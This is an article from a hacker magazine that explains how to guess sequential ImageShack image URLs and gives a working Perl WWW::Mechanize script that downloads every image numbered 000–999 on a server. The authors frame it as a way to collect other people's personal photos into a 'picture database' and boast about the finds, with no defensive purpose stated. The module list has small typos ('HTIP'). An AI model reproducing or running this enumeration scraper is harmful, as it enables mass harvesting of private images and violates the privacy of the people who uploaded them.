Hacking ImageShack

by System Downfall and Worm

Many people use ImageShack (imageshack.us) to quickly host a picture to show to their friends or to throw a screenshot on for some people to help with tech support or whatever.

But one thing that many people forget about posting personal images on ImageShack is that they are not private.  Anyone who goes around typing in random numbers can find that image.

Let's start by looking at the layout of the URL we will be using.  When you upload a picture to ImageShack it gives you about four different choices of URLs to use.  We have chosen to use this one because it is the easiest to guess since the other ones add other random numbers to them:

http://imgXXX.imageshack.us/my.php?image=XXX.jpg

The first set of X is the server number.

All servers start with img and end with between one and three numbers.

An example of a server number would be: img216

The second set of X is the image number.

Images can have names as well but it is easier to guess the numbers.  Numbers can also be as many numbers as the person wants, but the most common number of digits is three.

The easiest way to start doing this is to just type in the URL:

http://imgXXX.imageshack.us/my.php?image*=001.jpg

And move up in numbers until you find something interesting.  Believe me, I have found things that are very interesting.

After doing this for a longtime, we decided we needed a better solution: a script!

So we wrote a Perl script that parses through the HTML and downloads the photo to the current directory, then moves on to the next image.

Here's the script:

#!/usr/bin/perl -w
use strict;
use WWW::Mechanize;
use WWW::Mechanize::Link;

# Create an Object
my $mech = WWW::Mechanize->new();

my $number;

foreach $number ("000" .. "999") {
  # URL to search images on.
  my $url = "http://img216.imageshack.us/my.php?image=$number.jpg";

  # Request webpage
  $mech->get($url);

  # Search for all links containing .jpg or .jpeg extensions in the url.
  # Everything in between qr/ / is what to search for
  # The . means any character usually but we use \. to escape it
  # and make it literal. Then we did (jpe?g) which means to search for
  # the text jpg or jpeg.
  # The $ character means the end of the line/string.
  # The i at the end means make everything case insensitive

  my @link = $mech->find_all_links(tag => "a", url_regex => qr/\.(jpe?g)$/i);


  my $lurl;
  # find_all_links returns a link object
  # and in order to get the url from the object
  # you have to do a $link->url. 

  foreach my $currentlink (@link) {
    $mech->get($currentlink);
    $lurl = $currentlink->url();
  }

  # Take done.php?l=img301 out of the URL and replace with img301/
  $lurl =~ s/done\.php\?l\=img216\//img216\//;

  # Save image to file
  $mech->get($lurl, ":content_file" => "$number.jpg");
}

It works very quickly and you get a lot of good stuff.

The best idea, in my opinion, is to set up a web server and make a directory within it to run the script.  Then you can access your new picture database from anywhere!  Now, this script only finds JPG or JPEG files and only on one server.  You would have to edit the server number to do it on a new one.

This script also requires a few Perl modules which can be downloaded at www.cpan.org.  Here is a list of all of the modules required:

HTML::Form 1.038
HTML::HeadParser
HTML::TokeParser 2.28
HTIP::Daemon 0
HTIP::Request 1.3
HTIP::Status LWP 5.76,
LWP::UserAgent 2.024
URI 1.25
URI::URL
URI::file
WWW::Mechanize
Return to $2600 Index